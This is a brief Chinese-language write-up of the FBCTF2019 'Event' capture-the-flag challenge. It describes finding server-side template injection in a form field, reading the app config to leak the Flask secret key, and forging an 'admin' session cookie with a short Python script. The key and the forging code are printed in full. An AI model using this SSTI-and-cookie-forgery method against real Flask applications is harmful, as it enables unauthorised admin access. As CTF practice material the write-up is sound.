[FBCTF2019]Event
打开后有登录
登录后有相关功能和cookie中的jwt
解密发现
十六进制转字符发现是类似于base的字符串
DjAIokH7oQUv2ZV/J5xBZu28tpigqMP48g3GOkEKnmrqfsJLElT5FLtZFXvE82IHutAdPlPe0tk+mPow5fCX9w==
但是解不出来。先找key吧
fuzz后发现
在important中可以进行ssti
尝试读取config
找到key
fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y
一个jwt不知道怎么用,另一个user处的cookie不知道啥意思
看了眼wp,是用user处,但是需要在自己写flask生成
from flask import Flask
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)
@app.route('/')
def index():
print(session_serializer.dumps("admin"))
index()